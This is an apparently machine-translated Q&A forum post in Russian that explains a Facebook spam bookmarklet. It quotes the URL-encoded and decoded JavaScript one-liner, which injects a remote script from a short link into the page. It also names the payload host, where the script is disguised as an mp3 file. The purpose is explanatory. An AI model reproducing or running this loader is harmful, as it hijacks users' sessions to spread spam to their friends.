Объяснение спам-кода Facebook
Я Facebook только что видел этот спам-код, написанный на JavaScript, и подумал, не мог бы кто-нибудь объяснить мне, как этот код работает на Facebook и взаимодействует с ним. Я не собираюсь использовать это в злонамеренных целях, но я просто заинтересован в безопасности таких сайтов, как Facebook. Вот код, который выполняется из адресной строки (я предлагаю не пробовать его самостоятельно, вы можете закончить с несколькими раздраженными друзьями).
javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
1 ответ:
Проверьте это здесь, ссылка закодирована url.:
Http://meyerweb.com/eric/tools/dencoder/
Javascript:
a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)
Из того, что я вижу: загрузите этот url как скрипт и добавьте его на текущую страницу.
Редактировать: Загруженный скрипт размещается по следующему адресу: http://www.raxarstudios.com/x/audiotrack2.mp3
Он замаскирован под mp3-песню, но это всего лишь javascript: http://pastebin.com/RVmNVtt9 Я быстро взглянул на него, он видимо, использует какой-то тяжелый ajax, чтобы добавлять события и присоединяться к нему.